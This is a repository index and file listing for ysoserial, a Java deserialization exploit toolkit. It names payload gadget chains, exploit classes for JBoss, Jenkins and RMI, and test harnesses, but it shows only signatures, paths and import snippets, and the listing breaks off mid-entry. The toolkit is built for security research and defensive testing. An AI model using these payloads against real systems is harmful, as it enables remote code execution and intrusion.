FILE: src/main/java/ysoserial/payloads/Hibernate2.java
  class Hibernate2 (line 42) | @SuppressWarnings ( {
    method isApplicableJavaVersion (line 48) | public static boolean isApplicableJavaVersion() {
    method getDependencies (line 52) | public static String[] getDependencies () {
    method getObject (line 56) | public Object getObject ( String command ) throws Exception {
    method main (line 63) | public static void main ( final String[] args ) throws Exception {

FILE: src/main/java/ysoserial/payloads/JBossInterceptors1.java
  class JBossInterceptors1 (line 31) | @SuppressWarnings({"rawtypes", "unchecked"})
    method isApplicableJavaVersion (line 38) | public static boolean isApplicableJavaVersion() {
    method getObject (line 42) | public Object getObject(final String command) throws Exception {
    method main (line 87) | public static void main(final String[] args) throws Exception {

FILE: src/main/java/ysoserial/payloads/JRMPClient.java
  class JRMPClient (line 49) | @SuppressWarnings ( {
    method getObject (line 56) | public Registry getObject ( final String command ) throws Exception {
    method main (line 80) | public static void main ( final String[] args ) throws Exception {

FILE: src/main/java/ysoserial/payloads/JRMPListener.java
  class JRMPListener (line 34) | @SuppressWarnings ( {
    method getObject (line 41) | public UnicastRemoteObject getObject ( final String command ) throws E...
    method main (line 54) | public static void main ( final String[] args ) throws Exception {

FILE: src/main/java/ysoserial/payloads/JSON1.java
  class JSON1 (line 59) | @SuppressWarnings ( {
    method getObject (line 70) | public Map getObject ( String command ) throws Exception {
    method makeCallerChain (line 78) | public static Map makeCallerChain ( Object payload, Class... ifaces ) ...
    method main (line 114) | public static void main ( final String[] args ) throws Exception {

FILE: src/main/java/ysoserial/payloads/JavassistWeld1.java
  class JavassistWeld1 (line 31) | @SuppressWarnings({"rawtypes", "unchecked"})
    method isApplicableJavaVersion (line 38) | public static boolean isApplicableJavaVersion() {
    method getObject (line 42) | public Object getObject(final String command) throws Exception {
    method main (line 87) | public static void main(final String[] args) throws Exception {

FILE: src/main/java/ysoserial/payloads/Jdk7u21.java
  class Jdk7u21 (line 56) | @SuppressWarnings({ "rawtypes", "unchecked" })
    method getObject (line 62) | public Object getObject(final String command) throws Exception {
    method isApplicableJavaVersion (line 86) | public static boolean isApplicableJavaVersion() {
    method main (line 91) | public static void main(final String[] args) throws Exception {

FILE: src/main/java/ysoserial/payloads/Jython1.java
  class Jython1 (line 42) | @PayloadTest(skip="non RCE")
    method getObject (line 48) | public PriorityQueue getObject(String command) throws Exception {
    method main (line 105) | public static void main(final String[] args) throws Exception {

FILE: src/main/java/ysoserial/payloads/MozillaRhino1.java
  class MozillaRhino1 (line 21) | @SuppressWarnings({"rawtypes", "unchecked"})
    method getObject (line 27) | public Object getObject(final String command) throws Exception {
    method main (line 69) | public static void main(final String[] args) throws Exception {
    method isApplicableJavaVersion (line 73) | public static boolean isApplicableJavaVersion() {

FILE: src/main/java/ysoserial/payloads/MozillaRhino2.java
  class MozillaRhino2 (line 49) | @SuppressWarnings({"rawtypes", "unchecked"})
    method getObject (line 54) | public Object getObject( String command) throws Exception {
    method customWriteAdapterObject (line 99) | public static void customWriteAdapterObject(Object javaObject, ObjectO...
    method main (line 105) | public static void main(final String[] args) throws Exception {

FILE: src/main/java/ysoserial/payloads/Myfaces1.java
  class Myfaces1 (line 43) | @PayloadTest(skip="Requires running MyFaces, no direct execution")
    method getObject (line 47) | public Object getObject ( String command ) throws Exception {
    method getDependencies (line 52) | public static String[] getDependencies () {
    method makeExpressionPayload (line 76) | public static Object makeExpressionPayload ( String expr ) throws Ille...
    method main (line 91) | public static void main ( final String[] args ) throws Exception {

FILE: src/main/java/ysoserial/payloads/Myfaces2.java
  class Myfaces2 (line 32) | @PayloadTest(harness="ysoserial.test.payloads.MyfacesTest", precondition...
    method isApplicableJavaVersion (line 35) | public static boolean isApplicableJavaVersion() {
    method getDependencies (line 39) | public static String[] getDependencies () {
    method getObject (line 44) | public Object getObject ( String command ) throws Exception {
    method main (line 67) | public static void main ( final String[] args ) throws Exception {

FILE: src/main/java/ysoserial/payloads/ObjectPayload.java
  type ObjectPayload (line 13) | @SuppressWarnings ( "rawtypes" )
    method getObject (line 20) | public T getObject ( String command ) throws Exception;
    class Utils (line 22) | public static class Utils {
      method getPayloadClasses (line 25) | public static Set<Class<? extends ObjectPayload>> getPayloadClasses ...
      method getPayloadClass (line 38) | @SuppressWarnings ( "unchecked" )
      method makePayloadObject (line 59) | public static Object makePayloadObject ( String payloadType, String ...
      method releasePayload (line 78) | @SuppressWarnings ( "unchecked" )
      method releasePayload (line 86) | public static void releasePayload ( String payloadType, Object paylo...

FILE: src/main/java/ysoserial/payloads/ROME.java
  class ROME (line 31) | @Dependencies("rome:rome:1.0")
    method getObject (line 35) | public Object getObject ( String command ) throws Exception {
    method main (line 43) | public static void main ( final String[] args ) throws Exception {

FILE: src/main/java/ysoserial/payloads/ReleaseableObjectPayload.java
  type ReleaseableObjectPayload (line 8) | public interface ReleaseableObjectPayload<T> extends ObjectPayload<T> {
    method release (line 10) | void release( T obj ) throws Exception;

FILE: src/main/java/ysoserial/payloads/Spring1.java
  class Spring1 (line 50) | @SuppressWarnings({"rawtypes"})
    method getObject (line 56) | public Object getObject(final String command) throws Exception {
    method main (line 77) | public static void main(final String[] args) throws Exception {
    method isApplicableJavaVersion (line 81) | public static boolean isApplicableJavaVersion() {

FILE: src/main/java/ysoserial/payloads/Spring2.java
  class Spring2 (line 39) | @PayloadTest ( precondition = "isApplicableJavaVersion")
    method getObject (line 48) | public Object getObject ( final String command ) throws Exception {
    method main (line 69) | public static void main ( final String[] args ) throws Exception {
    method isApplicableJavaVersion (line 73) | public static boolean isApplicableJavaVersion() {

FILE: src/main/java/ysoserial/payloads/URLDNS.java
  class URLDNS (line 43) | @SuppressWarnings({ "rawtypes", "unchecked" })
    method getObject (line 49) | public Object getObject(final String url) throws Exception {
    method main (line 64) | public static void main(final String[] args) throws Exception {
    class SilentURLStreamHandler (line 77) | static class SilentURLStreamHandler extends URLStreamHandler {
      method openConnection (line 79) | protected URLConnection openConnection(URL u) throws IOException {
      method getHostAddress (line 83) | protected synchronized InetAddress getHostAddress(URL u) {

FILE: src/main/java/ysoserial/payloads/Vaadin1.java
  class Vaadin1 (line 16) | @Dependencies ( { "com.vaadin:vaadin-server:7.7.14", "com.vaadin:vaadin-...
    method getObject (line 59) | @Override
    method isApplicableJavaVersion (line 74) | public static boolean isApplicableJavaVersion() {
    method main (line 78) | public static void main(final String[] args) throws Exception {

FILE: src/main/java/ysoserial/payloads/Wicket1.java
  class Wicket1 (line 49) | @PayloadTest(harness="ysoserial.test.payloads.FileUploadTest", flaky="po...
    method getObject (line 54) | public DiskFileItem getObject(String command) throws Exception {
    method release (line 80) | public void release(DiskFileItem obj) throws Exception {
    method copyAndDelete (line 83) | private static DiskFileItem copyAndDelete ( String copyAndDelete, Stri...
    method write (line 88) | private static DiskFileItem write ( String dir, byte[] data ) throws I...
    method writeOldJRE (line 93) | private static DiskFileItem writeOldJRE(String file, byte[] data) thro...
    method makePayload (line 97) | private static DiskFileItem makePayload(int thresh, String repoPath, S...
    method main (line 112) | public static void main ( final String[] args ) throws Exception {

FILE: src/main/java/ysoserial/payloads/annotation/Authors.java
  class Utils (line 31) | public static class Utils {
    method getAuthors (line 32) | public static String[] getAuthors(AnnotatedElement annotated) {

FILE: src/main/java/ysoserial/payloads/annotation/Dependencies.java
  class Utils (line 14) | public static class Utils {
    method getDependencies (line 15) | public static String[] getDependencies(AnnotatedElement annotated) {
    method getDependenciesSimple (line 24) | public static String[] getDependenciesSimple(AnnotatedElement annotate...

FILE: src/main/java/ysoserial/payloads/util/ClassFiles.java
  class ClassFiles (line 7) | public class ClassFiles {
    method classAsFile (line 8) | public static String classAsFile(final Class<?> clazz) {
    method classAsFile (line 12) | public static String classAsFile(final Class<?> clazz, boolean suffix) {
    method classAsBytes (line 25) | public static byte[] classAsBytes(final Class<?> clazz) {

FILE: src/main/java/ysoserial/payloads/util/Gadgets.java
  class Gadgets (line 32) | @SuppressWarnings ( {
    class StubTransletPayload (line 47) | public static class StubTransletPayload extends AbstractTranslet imple...
      method transform (line 52) | public void transform ( DOM document, SerializationHandler[] handler...
      method transform (line 55) | @Override
    class Foo (line 60) | public static class Foo implements Serializable {
    method createMemoitizedProxy (line 66) | public static <T> T createMemoitizedProxy ( final Map<String, Object> ...
    method createMemoizedInvocationHandler (line 71) | public static InvocationHandler createMemoizedInvocationHandler ( fina...
    method createProxy (line 76) | public static <T> T createProxy ( final InvocationHandler ih, final Cl...
    method createMap (line 86) | public static Map<String, Object> createMap ( final String key, final ...
    method createTemplatesImpl (line 93) | public static Object createTemplatesImpl ( final String command ) thro...
    method createTemplatesImpl (line 106) | public static <T> T createTemplatesImpl ( final String command, Class<...
    method makeMap (line 140) | public static HashMap makeMap ( Object v1, Object v2 ) throws Exceptio...

FILE: src/main/java/ysoserial/payloads/util/JavaVersion.java
  class JavaVersion (line 8) | public class JavaVersion {
    method getLocalVersion (line 17) | public static JavaVersion getLocalVersion() {
    method isAnnInvHUniversalMethodImpl (line 31) | public static boolean isAnnInvHUniversalMethodImpl() {
    method isBadAttrValExcReadObj (line 36) | public static boolean isBadAttrValExcReadObj() {
    method isAtLeast (line 41) | public static boolean isAtLeast(int major) {

FILE: src/main/java/ysoserial/payloads/util/PayloadRunner.java
  class PayloadRunner (line 16) | @SuppressWarnings("unused")
    method run (line 19) | public static void run(final Class<? extends ObjectPayload<?>> clazz, ...
    method getDefaultTestCmd (line 45) | private static String getDefaultTestCmd() {
    method getFirstExistingFile (line 54) | private static String getFirstExistingFile(String ... files) {

FILE: src/main/java/ysoserial/payloads/util/Reflections.java
  class Reflections (line 12) | @SuppressWarnings ( "restriction" )
    method setAccessible (line 15) | public static void setAccessible(AccessibleObject member) {
    method getField (line 30) | public static Field getField(final Class<?> clazz, final String fieldN...
    method setFieldValue (line 43) | public static void setFieldValue(final Object obj, final String fieldN...
    method getFieldValue (line 48) | public static Object getFieldValue(final Object obj, final String fiel...
    method getFirstCtor (line 53) | public static Constructor<?> getFirstCtor(final String name) throws Ex...
    method newInstance (line 59) | public static Object newInstance(String className, Object ... args) th...
    method createWithoutConstructor (line 63) | public static <T> T createWithoutConstructor ( Class<T> classToInstant...
    method createWithConstructor (line 68) | @SuppressWarnings ( {"unchecked"} )

FILE: src/main/java/ysoserial/secmgr/DelegateSecurityManager.java
  class DelegateSecurityManager (line 7) | @SuppressWarnings({"deprecation"})
    method getSecurityManager (line 11) | public SecurityManager getSecurityManager() {
    method setSecurityManager (line 15) | public void setSecurityManager(SecurityManager securityManager) {
    method getInCheck (line 21) | @SuppressWarnings({"deprecation"})
    method checkTopLevelWindow (line 28) | @SuppressWarnings({"deprecation"})
    method checkSystemClipboardAccess (line 35) | @SuppressWarnings({"deprecation"})
    method checkAwtEventQueueAccess (line 41) | @SuppressWarnings({"deprecation"})
    method checkMemberAccess (line 47) | @SuppressWarnings({"deprecation"})
    method getSecurityContext (line 55) | @Override
    method checkPermission (line 60) | @Override
    method checkPermission (line 65) | @Override
    method checkCreateClassLoader (line 70) | @Override
    method checkAccess (line 75) | @Override
    method checkAccess (line 80) | @Override
    method checkExit (line 85) | @Override
    method checkExec (line 90) | @Override
    method checkLink (line 95) | @Override
    method checkRead (line 100) | @Override
    method checkRead (line 105) | @Override
    method checkRead (line 110) | @Override
    method checkWrite (line 115) | @Override
    method checkWrite (line 120) | @Override
    method checkDelete (line 125) | @Override
    method checkConnect (line 130) | @Override
    method checkConnect (line 135) | @Override
    method checkListen (line 140) | @Override
    method checkAccept (line 145) | @Override
    method checkMulticast (line 150) | @Override
    method checkMulticast (line 155) | @SuppressWarnings({"deprecation"})
    method checkPropertiesAccess (line 161) | @Override
    method checkPropertyAccess (line 166) | @Override
    method checkPrintJobAccess (line 171) | @Override
    method checkPackageAccess (line 176) | @Override
    method checkPackageDefinition (line 182) | @Override
    method checkSetFactory (line 187) | @Override
    method checkSecurityAccess (line 192) | @Override
    method getThreadGroup (line 197) | @Override

FILE: src/main/java/ysoserial/secmgr/ExecCheckingSecurityManager.java
  class ExecCheckingSecurityManager (line 10) | public class ExecCheckingSecurityManager extends SecurityManager {
    method ExecCheckingSecurityManager (line 11) | public ExecCheckingSecurityManager() {
    method ExecCheckingSecurityManager (line 15) | public ExecCheckingSecurityManager(boolean throwException) {
    method getCmds (line 23) | public List<String> getCmds() {
    method checkPermission (line 27) | @Override
    method checkPermission (line 30) | @Override
    method checkExec (line 33) | @Override
    class ExecException (line 45) | @SuppressWarnings("serial")
      method ExecException (line 49) | public ExecException(String cmd) { this.cmd = cmd; }
      method getCmd (line 50) | public String getCmd() { return cmd; }
      method getThreadName (line 51) | public String getThreadName() { return threadName; }
      method getMessage (line 52) | @
    method callWrapped (line 59) | public void callWrapped(final Runnable runnable) throws Exception {
    method callWrapped (line 68) | public <T> T callWrapped(final Callable<T> callable) throws Exception {

FILE: src/test/java/ysoserial/CiTest.java
  class CiTest (line 5) | public class CiTest {
    method test (line 6) | @Test

FILE: src/test/java/ysoserial/test/CustomDeserializer.java
  type CustomDeserializer (line 8) | public interface CustomDeserializer {
    method getCustomDeserializer (line 11) | Class<?> getCustomDeserializer ();

FILE: src/test/java/ysoserial/test/CustomPayloadArgs.java
  type CustomPayloadArgs (line 8) | public interface CustomPayloadArgs {
    method getPayloadArgs (line 11) | String getPayloadArgs ();

FILE: src/test/java/ysoserial/test/CustomTest.java
  type CustomTest (line 9) | public interface CustomTest extends CustomPayloadArgs {
    method run (line 11) | void run (Callable<Object> payload) throws Exception;

FILE: src/test/java/ysoserial/test/WrappedTest.java
  type WrappedTest (line 9) | public interface WrappedTest extends CustomPayloadArgs {
    method createCallable (line 11) | Callable<Object> createCallable ( Callable<Object> innerCallable );

FILE: src/test/java/ysoserial/test/exploit/RMIRegistryExploitTest.java
  class RMIRegistryExploitTest (line 7) | public class RMIRegistryExploitTest {
    method createRegistry (line 8) | public static void createRegistry(int port) throws RemoteException {
    method main (line 12) | public static void main(String[] args) throws RemoteException, Interru...

FILE: src/test/java/ysoserial/test/payloads/CommandExecTest.java
  class CommandExecTest (line 12) | public class CommandExecTest implements CustomTest {
    method run (line 16) | @Override
    method getPayloadArgs (line 29) | @Override

FILE: src/test/java/ysoserial/test/payloads/FileUploadTest.java
  class FileUploadTest (line 19) | public class FileUploadTest implements CustomTest {
    method FileUploadTest (line 32) | public FileUploadTest () {
    method run (line 43) | public synchronized void run ( Callable<Object> payload ) throws Excep...
    method safeDeleteOnExit (line 74) | private static void safeDeleteOnExit(File f) {
    method getPayloadArgs (line 84) | public String getPayloadArgs () {

FILE: src/test/java/ysoserial/test/payloads/JRMPReverseConnectSMTest.java
  class JRMPReverseConnectSMTest (line 15) | public class JRMPReverseConnectSMTest extends RemoteClassLoadingTest imp...
    method JRMPReverseConnectSMTest (line 20) | public JRMPReverseConnectSMTest (String command) {
    method createCallable (line 35) | @Override
    method getPayloadArgs (line 56) | @Override

FILE: src/test/java/ysoserial/test/payloads/JRMPReverseConnectTest.java
  class JRMPReverseConnectTest (line 18) | public class JRMPReverseConnectTest implements CustomTest {
    method JRMPReverseConnectTest (line 26) | public JRMPReverseConnectTest () {
    method run (line 32) | public void run ( Callable<Object> payload ) throws Exception {
    method getPayloadArgs (line 53) | public String getPayloadArgs () {

FILE: src/test/java/ysoserial/test/payloads/MyfacesTest.java
  class MyfacesTest (line 35) | public class MyfacesTest extends RemoteClassLoadingTest implements Custo...
    method MyfacesTest (line 38) | public MyfacesTest ( String command ) {
    method getCustomDeserializer (line 44) | public Class<?> getCustomDeserializer () {
    class MyfacesDeserializer (line 54) | public static final class MyfacesDeserializer extends Deserializer {
      method getExtraDependencies (line 56) | public static Class<?>[] getExtraDependencies () {
      class MockRequestContext (line 62) | private static class MockRequestContext implements Answer<Object> {
        method answer (line 67) | public Object answer ( InvocationOnMock invocation ) throws Throwa...
      class MockELResolver (line 82) | private static class MockELResolver extends ELResolver {
        method MockELResolver (line 87) | public MockELResolver (ServletRequest req) {
        method getValue (line 92) | @Override
        method getType (line 103) | @Override
        method setValue (line 113) | @Override
        method isReadOnly (line 119) | @Override
        method getFeatureDescriptors (line 125) | @Override
        method getCommonPropertyType (line 131) | @Override
      method MyfacesDeserializer (line 138) | public MyfacesDeserializer ( byte[] bytes ) {
      method call (line 143) | @Override
      method createMockFacesContext (line 161) | private static FacesContext createMockFacesContext () throws Malform...

FILE: src/test/java/ysoserial/test/payloads/PayloadsTest.java
  class PayloadsTest (line 51) | @SuppressWarnings ( {
    method payloads (line 57) | @Parameters ( name = "payloadClass: {0}" )
    method PayloadsTest (line 67) | public PayloadsTest ( Class<? extends ObjectPayload<?>> payloadClass ) {
    method testPayload (line 72) | @Test
    method testPayload (line 78) | public static void testPayload ( final Class<? extends ObjectPayload<?...
    method makeSerializeCallable (line 152) | private static Callable<byte[]> makeSerializeCallable ( final Class<? ...
    method makeDeserializeCallable (line 166) | private static Callable<Object> makeDeserializeCallable ( PayloadTest ...
    method checkPrecondition (line 177) | private static boolean checkPrecondition ( Class<? extends ObjectPaylo...
    method buildDeps (line 184) | private static String[] buildDeps ( final Class<? extends ObjectPayloa...
    method deserializeWithDependencies (line 201) | static Object deserializeWithDependencies ( byte[] serialized, final S...
    method main (line 255) | public static void main(String[] args) {
    class StdIo (line 264) | public static class StdIo {
      method restoreStreams (line 269) | public static void restoreStreams() {
      method setStreams (line 273) | public static void setStreams(PrintStream out, PrintStream err) {
      method setStreams (line 278) | public static void setStreams(OutputStream out, OutputStream err) {
    class PayloadListener (line 283) | public static class PayloadListener extends RunListener {
      type Status (line 284) | public enum Status {
      method testStarted (line 298) | @Override
      method testFinished (line 313) | @Override
      method testFailure (line 325) | @Override
      method testAssumptionFailure (line 331) | @Override
      method getPayload (line 338) | public static String getPayload(String displayName) {

FILE: src/test/java/ysoserial/test/payloads/RemoteClassLoadingTest.java
  class RemoteClassLoadingTest (line 22) | public class RemoteClassLoadingTest implements WrappedTest {
    method RemoteClassLoadingTest (line 28) | public RemoteClassLoadingTest ( String command ) {
    method getPayloadArgs (line 35) | public String getPayloadArgs () {
    method getHTTPPort (line 39) | public int getHTTPPort () {
    method createCallable (line 43) | public Callable<Object> createCallable ( Callable<Object> innerCallabl...
    method getExploitClassName (line 47) | public String getExploitClassName () {
    method makePayloadClass (line 51) | protected byte[] makePayloadClass () {
    class RemoteClassLoadingTestCallable (line 66) | static class RemoteClassLoadingTestCallable extends NanoHTTPD implemen...
      method RemoteClassLoadingTestCallable (line 73) | public RemoteClassLoadingTestCallable ( int port, byte[] data, Calla...
      method waitFor (line 81) | public void waitFor() throws InterruptedException {
      method call (line 88) | public Object call () throws Exception {
      method setup (line 102) | private void setup () throws IOException {
      method cleanup (line 107) | private void cleanup () {
      method serve (line 112) | @Override
    class Exploit (line 126) | public static class Exploit implements Serializable {

FILE: src/test/java/ysoserial/test/payloads/TestHarnessTest.java
  class TestHarnessTest (line 12) | public class TestHarnessTest {
    method testHarnessExecFail (line 14) | @Test
    method testHarnessClassLoaderFail (line 26) | @Test
    method testHarnessExecPass (line 37) | @Test
    class ExecMockPayload (line 42) | public static class ExecMockPayload implements ObjectPayload<ExecMockS...
      method getObject (line 43) | public ExecMockSerializable getObject(String command) throws Excepti...
    class NoopMockPayload (line 48) | public static class NoopMockPayload implements ObjectPayload<Integer> {
      method getObject (line 49) | public Integer getObject(String command) throws Exception {
    class ExecMockSerializable (line 54) | @SuppressWarnings("serial")
      method ExecMockSerializable (line 57) | public ExecMockSerializable(String cmd) { this.cmd = cmd; }
      method readObject (line 59) | private void readObject(final ObjectInputStream ois) throws IOExcept...

FILE: src/test/java/ysoserial/test/util/Callables.java
  class Callables (line 5) | public class Callables {
    type BeforeAfterCallback (line 6) | public static interface BeforeAfterCallback {
      method before (line 7) | public void before();
      method after (line 8) | public void after();
    class Wrapper (line 11) | public static class Wrapper<T> implements Callable<T> {
      method Wrapper (line 15) | public Wrapper(Callable<T> callable, BeforeAfterCallback callback) {
      method call (line 20) | @Override
    method wrap (line 31) | public static <T> Callable<T> wrap(Callable<T> callable, BeforeAfterCa...

FILE: src/test/java/ysoserial/test/util/Files.java
  class Files (line 5) | public class Files {
    method waitForFile (line 6) | public static void waitForFile(File file, int timeoutMs) throws Interr...

FILE: src/test/java/ysoserial/test/util/GadgetsTest.java
  class GadgetsTest (line 6) | public class GadgetsTest {
    method test_createTemplatesImpl_noCompilationError (line 7) | @Test

FILE: src/test/java/ysoserial/test/util/OS.java
  type OS (line 3) | public enum OS {
    method get (line 11) | public static OS get() {
    method determineOs (line 15) | private static OS determineOs() {
    method getTmpDir (line 28) | public static String getTmpDir() {

FILE: src/test/java/ysoserial/test/util/Throwables.java
  class Throwables (line 3) | public class Throwables {
    method getInnermostCause (line 4) | public static Throwable getInnermostCause(final Throwable t) {
Condensed preview — 91 files, each showing path, character count, and a content snippet. The full structured content is 281K chars.
[
  {
    "path": ".editorconfig",
    "chars": 201,
    "preview": "root = true\n\n[*]\nend_of_line = lf\ncharset = utf-8\ntrim_trailing_whitespace = true\ninsert_final_newline = true\nindent_sty"
  },
  {
    "path": ".github/workflows/publish.yml",
    "chars": 1031,
    "preview": "name: publish jar\non:\n  push:\n    tags:\n      - \"v*.*.*\"\npermissions:\n  contents: write\n\njobs:\n  publish:\n    runs-on: u"
  },
  {
    "path": ".gitignore",
    "chars": 110,
    "preview": "# java\n*.class\n\n# mvn\ntarget/\n\n# eclipse\n.classpath\n.project\n.settings/\n\n# idea\n.idea/\n*.iml\n\n# tests\npwntest\n"
  },
  {
    "path": ".travis.yml",
    "chars": 1286,
    "preview": "dist: trusty\nlanguage: java\n\ncache:\n  directories:\n  - $HOME/.m2\n  - $HOME/.mvn/\n\n# jdk6 requires workarounds https://gi"
  },
  {
    "path": "DISCLAIMER.txt",
    "chars": 327,
    "preview": "DISCLAIMER\n\nThis software has been created purely for the purposes of academic research and\nfor the development of effec"
  },
  {
    "path": "Dockerfile",
    "chars": 424,
    "preview": "FROM maven:3.5-jdk-8 as builder\n\nWORKDIR /app\n\n# download artifacts\nCOPY pom.xml .\nCOPY assembly.xml .\nRUN mvn dependenc"
  },
  {
    "path": "LICENSE.txt",
    "chars": 1069,
    "preview": "Copyright (c) 2013 Chris Frohoff\n\nMIT License\n\nPermission is hereby granted, free of charge, to any person obtaining\na c"
  },
  {
    "path": "README.md",
    "chars": 7462,
    "preview": "\n# ysoserial\n\n[![GitHub release](https://img.shields.io/github/downloads/frohoff/ysoserial/latest/total)](https://github"
  },
  {
    "path": "appveyor.yml",
    "chars": 1078,
    "preview": "# based on https://github.com/GoogleCloudPlatform/google-cloud-java/blob/master/appveyor.yml\n\n# build version\nversion: '"
  },
  {
    "path": "assembly.xml",
    "chars": 1047,
    "preview": "<assembly\n    xmlns=\"http://maven.apache.org/plugins/maven-assembly-plugin/assembly/1.1.3\"\n    xmlns:xsi=\"http://www.w3."
  },
  {
    "path": "pom.xml",
    "chars": 12230,
    "preview": "<project xmlns=\"http://maven.apache.org/POM/4.0.0\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\"\n\txsi:schemaLoca"
  },
  {
    "path": "src/main/java/ysoserial/Deserializer.java",
    "chars": 1080,
    "preview": "package ysoserial;\n\nimport java.io.ByteArrayInputStream;\nimport java.io.File;\nimport java.io.FileInputStream;\nimport jav"
  },
  {
    "path": "src/main/java/ysoserial/GeneratePayload.java",
    "chars": 2549,
    "preview": "package ysoserial;\n\nimport java.io.PrintStream;\nimport java.util.*;\n\nimport ysoserial.payloads.ObjectPayload;\nimport yso"
  },
  {
    "path": "src/main/java/ysoserial/Serializer.java",
    "chars": 791,
    "preview": "package ysoserial;\n\nimport java.io.ByteArrayOutputStream;\nimport java.io.IOException;\nimport java.io.ObjectOutputStream;"
  },
  {
    "path": "src/main/java/ysoserial/Strings.java",
    "chars": 1935,
    "preview": "package ysoserial;\n\nimport org.apache.commons.lang.StringUtils;\n\nimport java.util.Arrays;\nimport java.util.Comparator;\ni"
  },
  {
    "path": "src/main/java/ysoserial/exploit/JBoss.java",
    "chars": 15295,
    "preview": "package ysoserial.exploit;\n\n\nimport java.io.IOException;\nimport java.lang.reflect.InvocationTargetException;\nimport java"
  },
  {
    "path": "src/main/java/ysoserial/exploit/JMXInvokeMBean.java",
    "chars": 1435,
    "preview": "package ysoserial.exploit;\n\nimport javax.management.MBeanServerConnection;\nimport javax.management.ObjectName;\nimport ja"
  },
  {
    "path": "src/main/java/ysoserial/exploit/JRMPClassLoadingListener.java",
    "chars": 1639,
    "preview": "package ysoserial.exploit;\n\n\n\nimport java.net.URL;\n\n\n/**\n * JRMP listener triggering RMI remote classloading\n * \n * Open"
  },
  {
    "path": "src/main/java/ysoserial/exploit/JRMPClient.java",
    "chars": 4180,
    "preview": "package ysoserial.exploit;\n\n\nimport java.io.DataOutputStream;\nimport java.io.IOException;\nimport java.io.ObjectOutputStr"
  },
  {
    "path": "src/main/java/ysoserial/exploit/JRMPListener.java",
    "chars": 10103,
    "preview": "package ysoserial.exploit;\n\n\nimport java.io.BufferedInputStream;\nimport java.io.BufferedOutputStream;\nimport java.io.Dat"
  },
  {
    "path": "src/main/java/ysoserial/exploit/JSF.java",
    "chars": 2458,
    "preview": "package ysoserial.exploit;\n\n\nimport java.io.ByteArrayOutputStream;\nimport java.io.ObjectOutputStream;\nimport java.io.Out"
  },
  {
    "path": "src/main/java/ysoserial/exploit/JenkinsCLI.java",
    "chars": 4601,
    "preview": "package ysoserial.exploit;\n\nimport java.io.DataOutputStream;\nimport java.io.IOException;\nimport java.io.OutputStream;\nim"
  },
  {
    "path": "src/main/java/ysoserial/exploit/JenkinsListener.java",
    "chars": 7658,
    "preview": "package ysoserial.exploit;\n\n\nimport java.io.DataOutputStream;\nimport java.io.IOException;\nimport java.io.ObjectOutputStr"
  },
  {
    "path": "src/main/java/ysoserial/exploit/JenkinsReverse.java",
    "chars": 2477,
    "preview": "package ysoserial.exploit;\n\n\nimport java.io.IOException;\nimport java.net.InetSocketAddress;\nimport java.rmi.registry.Reg"
  },
  {
    "path": "src/main/java/ysoserial/exploit/RMIRegistryExploit.java",
    "chars": 3480,
    "preview": "package ysoserial.exploit;\n\nimport java.io.IOException;\nimport java.net.Socket;\nimport java.rmi.ConnectIOException;\nimpo"
  },
  {
    "path": "src/main/java/ysoserial/payloads/AspectJWeaver.java",
    "chars": 3744,
    "preview": "package ysoserial.payloads;\n\nimport org.apache.commons.codec.binary.Base64;\nimport org.apache.commons.collections.Transf"
  },
  {
    "path": "src/main/java/ysoserial/payloads/BeanShell1.java",
    "chars": 2183,
    "preview": "package ysoserial.payloads;\n\nimport bsh.Interpreter;\nimport bsh.XThis;\n\nimport java.lang.reflect.InvocationHandler;\nimpo"
  },
  {
    "path": "src/main/java/ysoserial/payloads/C3P0.java",
    "chars": 3065,
    "preview": "package ysoserial.payloads;\n\n\nimport java.io.PrintWriter;\nimport java.sql.SQLException;\nimport java.sql.SQLFeatureNotSup"
  },
  {
    "path": "src/main/java/ysoserial/payloads/Click1.java",
    "chars": 3154,
    "preview": "package ysoserial.payloads;\n\nimport org.apache.click.control.Column;\nimport org.apache.click.control.Table;\nimport ysose"
  },
  {
    "path": "src/main/java/ysoserial/payloads/Clojure.java",
    "chars": 2393,
    "preview": "package ysoserial.payloads;\n\nimport clojure.inspector.proxy$javax.swing.table.AbstractTableModel$ff19274a;\nimport clojur"
  },
  {
    "path": "src/main/java/ysoserial/payloads/CommonsBeanutils1.java",
    "chars": 1568,
    "preview": "package ysoserial.payloads;\n\nimport java.math.BigInteger;\nimport java.util.PriorityQueue;\n\nimport org.apache.commons.bea"
  },
  {
    "path": "src/main/java/ysoserial/payloads/CommonsCollections1.java",
    "chars": 3067,
    "preview": "package ysoserial.payloads;\n\nimport java.lang.reflect.InvocationHandler;\nimport java.util.HashMap;\nimport java.util.Map;"
  },
  {
    "path": "src/main/java/ysoserial/payloads/CommonsCollections2.java",
    "chars": 1827,
    "preview": "package ysoserial.payloads;\n\nimport java.util.PriorityQueue;\nimport java.util.Queue;\n\nimport org.apache.commons.collecti"
  },
  {
    "path": "src/main/java/ysoserial/payloads/CommonsCollections3.java",
    "chars": 2440,
    "preview": "package ysoserial.payloads;\n\nimport java.lang.reflect.InvocationHandler;\nimport java.util.HashMap;\nimport java.util.Map;"
  },
  {
    "path": "src/main/java/ysoserial/payloads/CommonsCollections4.java",
    "chars": 2268,
    "preview": "package ysoserial.payloads;\n\nimport java.util.PriorityQueue;\nimport java.util.Queue;\n\nimport javax.xml.transform.Templat"
  },
  {
    "path": "src/main/java/ysoserial/payloads/CommonsCollections5.java",
    "chars": 3815,
    "preview": "package ysoserial.payloads;\n\nimport java.lang.reflect.Field;\nimport java.lang.reflect.InvocationHandler;\nimport java.uti"
  },
  {
    "path": "src/main/java/ysoserial/payloads/CommonsCollections6.java",
    "chars": 4023,
    "preview": "package ysoserial.payloads;\n\nimport org.apache.commons.collections.Transformer;\nimport org.apache.commons.collections.fu"
  },
  {
    "path": "src/main/java/ysoserial/payloads/CommonsCollections7.java",
    "chars": 3313,
    "preview": "package ysoserial.payloads;\n\nimport org.apache.commons.collections.Transformer;\nimport org.apache.commons.collections.fu"
  },
  {
    "path": "src/main/java/ysoserial/payloads/DynamicDependencies.java",
    "chars": 103,
    "preview": "package ysoserial.payloads;\n\n\n/**\n * @author mbechler\n *\n */\npublic interface DynamicDependencies {\n\n}\n"
  },
  {
    "path": "src/main/java/ysoserial/payloads/FileUpload1.java",
    "chars": 4706,
    "preview": "package ysoserial.payloads;\n\n\nimport java.io.File;\nimport java.io.IOException;\nimport java.io.OutputStream;\nimport java."
  },
  {
    "path": "src/main/java/ysoserial/payloads/Groovy1.java",
    "chars": 1325,
